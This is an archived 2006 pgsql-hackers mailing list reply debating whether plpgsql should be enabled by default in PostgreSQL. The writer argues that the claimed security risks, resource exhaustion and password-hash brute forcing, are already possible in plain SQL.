| From: | Andrew - Supernews <andrew+nonews(at)supernews(dot)com> |
|---|---|
| To: | pgsql-hackers(at)postgresql(dot)org |
| Subject: | Re: plpgsql by default (was: Re: Remote administration contrib module) |
| Date: | 2006-04-11 03:26:17 |
| Message-ID: | slrne3m8eo.2as.andrew+nonews@atlantis.supernews.net |
| Views: | Raw Message | Whole Thread | Download mbox | Resend email |
| Thread: | |
| Lists: | pgsql-hackers |
On 2006-04-11, Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us> wrote:
> Andrew - Supernews <andrew+nonews(at)supernews(dot)com> writes:
>> On 2006-04-10, Bruce Momjian <pgman(at)candle(dot)pha(dot)pa(dot)us> wrote:
>>>> [ security ]
>>> It actually is the reason I have heard.
>
>> And it was duly debunked.
>
> That is the reasoning, and personally I agree with it. You don't leave
> sharp objects sitting around if you have no need to have them out.
> The availability of plpgsql or other PLs makes for a significant jump
> in what a bad guy can do if he gets access to the database,
Example please.
Last time this was discussed, the claimed examples were things like
running infinite loops as a resource exhaustion attack, which is pretty
trivial to do in plain SQL functions or even in plain SQL without functions,
and running things like brute-force attacks on password hashes (which also
isn't hard using plain SQL functions).
--
Andrew, Supernews
http://www.supernews.com - individual and corporate NNTP services
| From | Date | Subject | |
|---|---|---|---|
| Next Message | Joshua D. Drake | 2006-04-11 03:46:04 | Re: plpgsql by default |
| Previous Message | Tom Lane | 2006-04-11 02:45:08 | Re: plpgsql by default (was: Re: Remote administration contrib module) |